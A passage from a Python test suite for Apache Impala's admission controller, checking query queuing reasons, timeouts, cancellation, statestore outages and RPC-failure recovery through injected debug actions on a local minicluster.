client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
handle = client.execute_async("select 2")
sleep(1)
client.close_query(handle)
self.assert_log_contains(self.get_ac_log_name(), 'INFO',
"Ready to be Admitted immediately but already cancelled, query id=")
client.set_configuration_option("debug_action",
"CRS_BEFORE_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 3")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=")
client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 4")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=", 2)
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
client.set_configuration_option("debug_action",
"AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
queued_query_handle = client.execute_async("select 5")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
# Only cancel the queued query, because close will wait till it unregisters, this
# gives us a chance to close the running query and allow the dequeue thread to
# dequeue the queue query
client.cancel(queued_query_handle)
client.close_query(handle)
client.close_query(queued_query_handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile, queued_profile
self.assert_log_contains(
self.get_ac_log_name(), 'INFO', "Dequeued cancelled query=")
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
queued_query_handle = client.execute_async("select 6")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
client.close_query(queued_query_handle)
client.close_query(handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile
for i in self.cluster.impalads:
i.service.wait_for_metric_value(
"impala-server.num-fragments-in-flight", 0, timeout=20)
assert self.get_ac_process().service.get_metric_value(
"admission-controller.agg-num-running.default-pool") == 0
assert self.get_ac_process().service.get_metric_value(
"admission-controller.total-admitted.default-pool") == 4
assert self.get_ac_process().service.get_metric_value(
"admission-controller.total-queued.default-pool") == 2
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_num_queries(self):
"""Test that queue details appear in the profile when queued based on num_queries."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select sleep(1000)"
TIMEOUT_S = 60
EXPECTED_REASON = \
"Latest admission queue reason: number of running queries 1 is at or over limit 1"
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S)
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons if 'number of running queries' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of num_queries: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_memory(self):
"""Test that queue details appear in the profile when queued based on memory."""
# Run a bunch of queries with mem_limit set so that only one can be admitted at a
# time- one should get admitted immediately, the rest should be dequeued one-by-one.
STMT = "select sleep(100)"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\
"available in pool default-pool with max mem resources 10.00 MB. Needed 9.00 MB" \
" but only 1.00 MB was available."
NUM_QUERIES = 5
# IMPALA-9856: Disable query result spooling so that we can run queries with low
# mem_limit.
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '9mb', 'spool_query_results': '0'})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail for detail in init_queue_reasons
if 'Not enough aggregate memory available' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of memory: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
def __extract_init_queue_reasons(self, profiles):
"""Return a list of the 'Admission Queue details' strings found in 'profiles'"""
matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles]
return [match.group(0) for match in matches if match is not None]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=2 * 1024 * 1024,
queue_wait_timeout_ms=1000),
statestored_args=_STATESTORED_ARGS)
def test_timeout_reason_host_memory(self):
"""Test that queue details appear in the profile when queued and then timed out
due to a small 2MB host memory limit configuration."""
# Run a bunch of queries with mem_limit set so that only one can be admitted
# immediately. The rest should be queued and dequeued (timeout) due to host memory
# pressure.
STMT = "select sleep(100)"
TIMEOUT_S = 20
NUM_QUERIES = 5
# IMPALA-9856: Disable query result spooling so that we can run queries with low
# mem_limit.
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '2mb', 'spool_query_results': '0'}, True)
EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
"""default-pool.*"""\
"""Not enough memory available on host.*"""\
"""Stats for host.*"""\
"""topN_query_stats.*"""\
"""all_query_stats:.*"""
num_reasons = len([profile for profile in profiles
if re.search(EXPECTED_REASON, profile, re.DOTALL)])
assert num_reasons >= 1, \
"At least one query should have been timed out with topN query details: " +\
'\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=2 * 1024 * 1024, proc_mem_limit=20 * 1024 * 1024,
queue_wait_timeout_ms=1000),
statestored_args=_STATESTORED_ARGS)
def test_timeout_reason_pool_memory(self):
"""Test that queue details appear in the profile when queued and then timed out
due to a small 2MB pool memory limit configuration."""
# Run a bunch of queries with mem_limit set so that only one can be admitted
# immediately. The rest should be queued and dequeued (timeout) due to pool memory
# pressure.
STMT = "select sleep(100)"
TIMEOUT_S = 20
NUM_QUERIES = 5
# IMPALA-9856: Disable query result spooling so that we can run queries with low
# mem_limit.
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '2mb', 'spool_query_results': '0'}, True)
EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
"""default-pool.*"""\
"""Not enough aggregate memory available in pool default-pool.*"""\
"""Aggregated stats for pool.*"""\
"""topN_query_stats.*"""
num_reasons = len([profile for profile in profiles
if re.search(EXPECTED_REASON, profile, re.DOTALL)])
assert num_reasons >= 1, \
"At least one query should have been timed out with topN query details: " +\
'\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=100, max_queued=10,
pool_max_mem=-1, admission_control_slots=4,
executor_groups="default-pool-group1"),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_slots(self):
"""Test that queue details appear in the profile when queued based on number of
slots."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select min(ss_wholesale_cost) from tpcds_parquet.store_sales"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough admission control " +\
"slots available on host"
NUM_QUERIES = 5
coordinator_limited_metric = \
"admission-controller.total-dequeue-failed-coordinator-limited"
original_metric_value = self.get_ac_process().service.get_metric_value(
coordinator_limited_metric)
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, config_options={"mt_dop": 4})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons
if "Not enough admission control slots available on host" in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of slots: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
# Confirm that the cluster quiesces and all metrics return to zero.
for impalad in self.cluster.impalads:
verifier = MetricVerifier(impalad.service)
verifier.wait_for_backend_admission_control_state()
# The number of admission control slots on the coordinator is limited
# so the failures to dequeue should trigger a bump in the coordinator_limited_metric.
later_metric_value = self.get_ac_process().service.get_metric_value(
coordinator_limited_metric)
assert later_metric_value > original_metric_value, \
"Metric %s did not change" % coordinator_limited_metric
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_query_locations_correctness(self, vector):
"""Regression test for IMPALA-7516: Test to make sure query locations and in-flight
queries are correct for different admission results that can affect it."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1"
# Case 1: When a query runs succesfully.
handle = self.client.execute_async(query)
self.__assert_num_queries_accounted(1)
self.close_query(handle)
self.__assert_num_queries_accounted(0)
# Case 2: When a query is queued then cancelled
handle_running = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_running)
handle_queued = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_queued)
self.get_ac_process().service.wait_for_metric_value(
"admission-controller.total-queued.default-pool", 1)
# Queued queries don't show up on backends
self.__assert_num_queries_accounted(1, 1)
# First close the queued query
self.close_query(handle_queued)
self.close_query(handle_running)
self.__assert_num_queries_accounted(0)
# Case 3: When a query gets rejected
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "1b"
self.execute_query_expect_failure(self.client, query, exec_options)
self.__assert_num_queries_accounted(0)
def __assert_num_queries_accounted(self, num_running, num_queued=0):
"""Checks if the num of queries accounted by query_locations and in-flight are as
expected"""
# Wait for queries to start/un-register.
num_inflight = num_running + num_queued
assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight)
query_locations = self.impalad_test_service.get_query_locations()
for host, num_q in query_locations.items():
assert num_q == num_running, "There should be {0} running queries on either " \
"impalads: {0}".format(query_locations)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_mem_limit_configs(self, vector):
"""Runs functional tests for the max/min_query_mem_limit pool config attributes"""
exec_options = vector.get_value('exec_option')
# Set this to the default.
exec_options['exec_single_node_rows_threshold'] = 100
# Set num_nodes to 1 since its easier to see one-to-one mapping of per_host and
# per_cluster values used in the test.
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-max-min-mem-limits', vector)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml",
additional_args="-default_pool_max_requests 1", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_config_change_while_queued(self, vector):
"""Tests that the invalid checks work even if the query is queued. Makes sure that a
queued query is dequeued and rejected if the config is invalid."""
# IMPALA-9856: This test modify request pool max-query-mem-limit. Therefore, we
# disable query result spooling so that min reservation of queries being run stay low
# by not involving BufferedPlanRootSink.
self.client.set_configuration_option('spool_query_results', 'false')
pool_name = "invalidTestPool"
config_str = "max-query-mem-limit"
self.client.set_configuration_option('request_pool', pool_name)
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
self._wait_for_change_to_profile(sleep_query_handle,
"Admission result: Admitted immediately")
queued_query_handle = self.client.execute_async("select 2")
self._wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to be invalid.
llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml")
config = ResourcePoolConfig(
self.cluster.impalads[0].service, self.get_ac_process().service, llama_site_path)
config.set_config_value(pool_name, config_str, 1)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
# Change the config back to a valid value
config.set_config_value(pool_name, config_str, 0)
# Now do the same thing for change to pool.max-query-mem-limit such that it can no
# longer accommodate the largest min_reservation.
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
queued_query_handle = self.client.execute_async(
"select * from functional_parquet.alltypes limit 1")
self._wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to something less than the what is required to accommodate the
# largest min_reservation (which in this case is 32.09 MB.
config.set_config_value(pool_name, config_str, 25 * 1024 * 1024)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
def _wait_for_change_to_profile(
self, query_handle, search_string, timeout=20, client=None):
if client is None:
client = self.client
for _ in range(timeout * 10):
profile = client.get_runtime_profile(query_handle)
if search_string in profile:
return
sleep(0.1)
assert False, "Timed out waiting for change to profile\nSearch " \
"String: {0}\nProfile:\n{1}".format(search_string, str(profile))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024))
@needs_session()
def test_queuing_status_through_query_log_and_exec_summary(self):
"""Test to verify that the HS2 client's GetLog() call and the ExecSummary expose
the query's queuing status, that is, whether the query was queued and what was the
latest queuing reason."""
# Start a long running query.
long_query_resp = self.execute_statement("select sleep(10000)")
# Ensure that the query has started executing.
self.wait_for_admission_control(long_query_resp.operationHandle)
# Submit another query.
queued_query_resp = self.execute_statement("select 1")
# Wait until the query is queued.
self.wait_for_operation_state(queued_query_resp.operationHandle,
TCLIService.TOperationState.PENDING_STATE)
# Check whether the query log message correctly exposes the queuing status.
log = self.wait_for_log_message(
queued_query_resp.operationHandle, "Admission result :")
assert "Admission result : Queued" in log, log
assert "Latest admission queue reason : number of running queries 1 is at or over "
"limit 1" in log, log
# Now check the same for ExecSummary.
summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq()
summary_req.operationHandle = queued_query_resp.operationHandle
summary_req.sessionHandle = self.session_handle
exec_summary_resp = self.hs2_client.GetExecSummary(summary_req)
assert exec_summary_resp.summary.is_queued
assert "number of running queries 1 is at or over limit 1" in \
exec_summary_resp.summary.queued_reason,\
exec_summary_resp.summary.queued_reason
# Close the running query.
self.close(long_query_resp.operationHandle)
# Close the queued query.
self.close(queued_query_resp.operationHandle)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3,
pool_max_mem=1024 * 1024 * 1024) +
" --admission_control_stale_topic_threshold_ms={0}".format(
STALE_TOPIC_THRESHOLD_MS),
statestored_args=_STATESTORED_ARGS)
def test_statestore_outage(self):
"""Test behaviour with a failed statestore. Queries should continue to be admitted
but we should generate diagnostics about the stale topic."""
self.cluster.statestored.kill()
impalad = self.get_ac_process()
# Sleep until the update should be definitely stale.
sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5)
ac_json = impalad.service.get_debug_webpage_json('/admission')
ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"]
assert ms_since_update > STALE_TOPIC_THRESHOLD_MS
assert ("Warning: admission control information from statestore is stale:" in
ac_json["statestore_update_staleness_detail"])
# Submit a batch of queries. One should get to run, one will be rejected because
# of the full queue, and the others will run after being queued.
STMT = "select sleep(100)"
TIMEOUT_S = 60
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, allow_query_failure=True)
ADMITTED_STALENESS_WARNING = \
"Warning: admission control information from statestore is stale"
ADMITTED_STALENESS_PROFILE_ENTRY = \
"Admission control state staleness: " + ADMITTED_STALENESS_WARNING
num_queued = 0
num_admitted_immediately = 0
num_rejected = 0
for profile in profiles:
if "Admission result: Admitted immediately" in profile:
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
num_admitted_immediately += 1
elif "Admission result: Rejected" in profile:
num_rejected += 1
# Check that the rejection error returned to the client contains a warning.
query_statuses = [line for line in profile.split("\n")
if "Query Status:" in line]
assert len(query_statuses) == 1, profile
assert ADMITTED_STALENESS_WARNING in query_statuses[0]
else:
assert "Admission result: Admitted (queued)" in profile, profile
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
# Check that the queued reason contains a warning.
queued_reasons = [line for line in profile.split("\n")
if "Initial admission queue reason:" in line]
assert len(queued_reasons) == 1, profile
assert ADMITTED_STALENESS_WARNING in queued_reasons[0]
num_queued += 1
assert num_admitted_immediately == 1
assert num_queued == 3
assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued
@pytest.mark.execute_serially
def test_impala_server_startup_delay(self):
"""This test verifies that queries get queued when the coordinator has already started
accepting client connections during startup, but the local backend descriptor is not
yet available."""
server_start_delay_s = 20
# We need to start the cluster here instead of during setup_method() so we can launch
# it from a separate thread.
def start_cluster():
LOG.info("Starting cluster")
impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % (
1000 * server_start_delay_s)
self._start_impala_cluster(['--impalad_args=%s' % impalad_args])
# Initiate the cluster start
start_cluster_thread = threading.Thread(target=start_cluster)
start_cluster_thread.start()
# Wait some time to arrive at IMPALA_SERVER_END_OF_START
sleep(server_start_delay_s)
# With a new client, execute a query and observe that it gets queued and ultimately
# succeeds.
client = self.create_impala_client()
result = self.execute_query_expect_success(client, "select 1")
start_cluster_thread.join()
profile = result.runtime_profile
reasons = self.__extract_init_queue_reasons([profile])
assert len(reasons) == 1
assert "Coordinator not registered with the statestore." in reasons[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_release_backends(self, vector):
"""Test that executor backends are shutdown when they complete, that completed
executor backends release their admitted memory, and that
NumCompletedBackends is updated each time an executor backend completes."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Craft a query where part of the executor backends completes, while the rest remain
# running indefinitely. The query forces the 'lineitem' table to be treated as the
# small table even though it is bigger than the 'customer' table. This forces the
# small table scan ('lineitem' scan) to run on two nodes and the big table scan
# ('customers' scan) to run on a single node. By using debug actions to force the
# big table scan to hang indefinitely, the small table scan should finish quickly.
# This causes one executor backend to complete quickly, and causes the other one to
# hang.
vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
"tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
# Amount of time to wait for the query to reach the running state before throwing a
# Timeout exception.
timeout = 10
handle = self.execute_query_async(query, vector.get_value('exec_option'))
try:
# Wait for the query to reach the running state (it should never reach the finished
# state because of the 'WAIT' debug action), wait for the 'lineitem' scan to
# complete, and then validate that one of the executor backends shutdowns and
# releases its admitted memory.
self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
# Once the 'lineitem' scan completes, NumCompletedBackends should be 1.
self.assert_eventually(60, 1, lambda: "NumCompletedBackends: 1 (1)"
in self.client.get_runtime_profile(handle))
get_num_completed_backends(self.cluster.impalads[0].service,
handle.get_handle().id) == 1
mem_admitted =\
get_mem_admitted_backends_debug_page(self.cluster, self.get_ac_process())
num_executor_zero_admitted = 0
for executor_mem_admitted in mem_admitted['executor']:
if executor_mem_admitted == 0:
num_executor_zero_admitted += 1
assert num_executor_zero_admitted == 1
finally:
# Once the query is closed, validate that all backends have shutdown.
self.client.close_query(handle)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
assert mem_admitted['coordinator'] == 0
for executor_mem_admitted in mem_admitted['executor']:
assert executor_mem_admitted == 0
class TestAdmissionControllerWithACService(TestAdmissionController):
"""Runs all of the tests from TestAdmissionController but with the second impalad in the
minicluster configured to perform all admission control."""
def get_ac_process(self):
return self.cluster.admissiond
def get_ac_log_name(self):
return "admissiond"
def setup_method(self, method):
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
if 'start_args' not in method.func_dict:
method.func_dict['start_args'] = list()
method.func_dict["start_args"].append("--enable_admission_service")
if "impalad_args" in method.func_dict:
method.func_dict["admissiond_args"] = method.func_dict["impalad_args"]
super(TestAdmissionController, self).setup_method(method)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(impalad_args="--admission_max_retry_time_s=5")
def test_admit_query_retry(self):
"""Tests that if the AdmitQuery rpc fails with a network error, either before or after
reaching the admissiond and being processed, it will be retried and the query will
eventually succeed."""
# Query designed to run for a few seconds.
query = "select count(*) from functional.alltypes where int_col = sleep(10)"
# Run the query with a debug action that will sometimes return errors from AdmitQuery
# even though the admissiond started scheduling successfully. Tests the path where the
# admissiond received multiple AdmitQuery rpcs with the same query id.
before_kill_handle = self.execute_query_async(
query, {"DEBUG_ACTION": "ADMIT_QUERY_NETWORK_ERROR:FAIL@0.5"})
timeout_s = 10
# Make sure the query is through admission control before killing the admissiond. It
# should be unaffected and finish successfully.
self.wait_for_state(
before_kill_handle, self.client.QUERY_STATES['RUNNING'], timeout_s)
self.cluster.admissiond.kill()
result = self.client.fetch(query, before_kill_handle)
assert result.data == ["730"]
# Run another query and sleep briefly before starting the admissiond again. It should
# retry until the admissiond is available again and then succeed.
after_kill_handle = self.execute_query_async(query)
sleep(1)
self.cluster.admissiond.start()
result = self.client.fetch(query, after_kill_handle)
assert result.data == ["730"]
# Kill the admissiond again and don't restart it this time. The query should
# eventually time out on retrying and fail.
self.cluster.admissiond.kill()
no_restart_handle = self.execute_query_async(query)
try:
result = self.client.fetch(query, no_restart_handle)
assert False, "Query should have failed"
except ImpalaBeeswaxException as e:
assert "Failed to admit query after waiting " in str(e)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--vmodule admission-controller=3 --default_pool_max_requests=1 "
"--debug_actions=IMPALA_SERVICE_POOL:127.0.0.1:29500:ReleaseQuery:FAIL@1.0")
def test_release_query_failed(self):
"""Tests that if the ReleaseQuery rpc fails, the query's resources will eventually be
cleaned up. Uses the --debug_action flag to simulate rpc failures, and sets max
requests for the default pool as the number of requests per pool is decremented when
the entire query is released."""
# Query designed to run for a few minutes.
query = "select count(*) from functional.alltypes where int_col = sleep(10000)"
handle1 = self.execute_query_async(query)
timeout_s = 10
# Make sure the first query has been admitted.
self.wait_for_state(
handle1, self.client.QUERY_STATES['RUNNING'], timeout_s)
# Run another query. This query should be queued because only 1 query is allowed in
# the default pool.
handle2 = self.execute_query_async(query)
self._wait_for_change_to_profile(handle2, "Admission result: Queued")
# Cancel the first query. It's resources should be released and the second query
# should be admitted.
self.client.cancel(handle1)
self.client.close_query(handle1)
self.wait_for_state(
handle2, self.client.QUERY_STATES['RUNNING'], timeout_s)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--vmodule admission-controller=3 "
"--debug_actions=IMPALA_SERVICE_POOL:127.0.0.1:29500:ReleaseQueryBackends:FAIL@1.0 "
"--admission_control_slots=1 --executor_groups=default-pool-group1")
def test_release_query_backends_failed(self):
"""Tests that if the ReleaseQueryBackends rpc fails, the query's resources will
eventually be cleaned up. Uses the --debug_action flag to simulate rpc failures, and
sets the number of slots for a single pool as slot usage per executor is decremented
when releasing individual backends."""
# Query designed to run for a few minutes.
query = "select count(*) from functional.alltypes where int_col = sleep(10000)"
handle1 = self.execute_query_async(query)
timeout_s = 10
# Make sure the first query has been admitted.
self.wait_for_state(
handle1, self.client.QUERY_STATES['RUNNING'], timeout_s)
# Run another query. This query should be queued because the executor group only has 1
# slot.
handle2 = self.execute_query_async(query)
self._wait_for_change_to_profile(handle2, "Admission result: Queued")
# Cancel the first query. It's resources should be released and the second query
# should be admitted.
self.client.cancel(handle1)
self.client.close_query(handle1)
self.wait_for_state(
handle2, self.client.QUERY_STATES['RUNNING'], timeout_s)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--vmodule admission-controller=3 --default_pool_max_requests=1")
def test_coordinator_failed(self):
"""Tests that if a coordinator fails, the resources for queries running at that
coordinator are eventually released."""
# Query designed to run for a few minutes.
query = "select count(*) from functional.alltypes where int_col = sleep(10000)"
impalad1 = self.cluster.impalads[0]
client1 = impalad1.service.create_beeswax_client()
handle1 = client1.execute_async(query)
timeout_s = 10
# Make sure the first query has been admitted.
self.wait_for_state(
handle1, self.client.QUERY_STATES['RUNNING'], timeout_s, client=client1)
# Run another query with a different coordinator. This query should be queued because
# only 1 query is allowed in the default pool.
impalad2 = self.cluster.impalads[1]
client2 = impalad2.service.create_beeswax_client()
handle2 = client2.execute_async(query)
self._wait_for_change_to_profile(handle2, "Admission result: Queued", client=client2)
# Kill the coordinator for the first query. The resources for the query should get
# cleaned up and the second query should be admitted.
impalad1.kill()
self.wait_for_state(
handle2, self.client.QUERY_STATES['RUNNING'], timeout_s, client=client2)
class TestAdmissionControllerStress(TestAdmissionControllerBase):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. Each query is submitted on a separate thread. After admission, the query
thread will block with the query open and wait for the main thread to notify it to
end its query. The query thread can end its query by fetching to the end, cancelling
itself, closing itself, or waiting for the query timeout to take effect. Depending
on the test parameters a varying number of queries will be admitted, queued, and
rejected. After the queries are admitted, the main thread will request each admitted
query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Request the currently running queries to end and wait for the queries to end.
Verify the metric for the number of completed queries. The threads that
submitted those queries will keep their connections open until the entire test
completes. This verifies that admission control is tied to the end of the query
and does not depend on closing the connection.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
wait for a notification from the main thread.
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
# Additional constraints for code coverage jobs and core.
num_queries = 50
if ImpalaTestClusterProperties.get_instance().has_code_coverage():
# Code coverage builds can't handle the increased concurrency.
num_queries = 15
elif cls.exploration_strategy() == 'core':
num_queries = 30
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('submission_delay_ms') == 0)
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('round_robin_submission'))
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('num_queries', num_queries))
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
# Set shutdown for all threads (cancel if needed)
for thread in self.all_threads:
try:
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
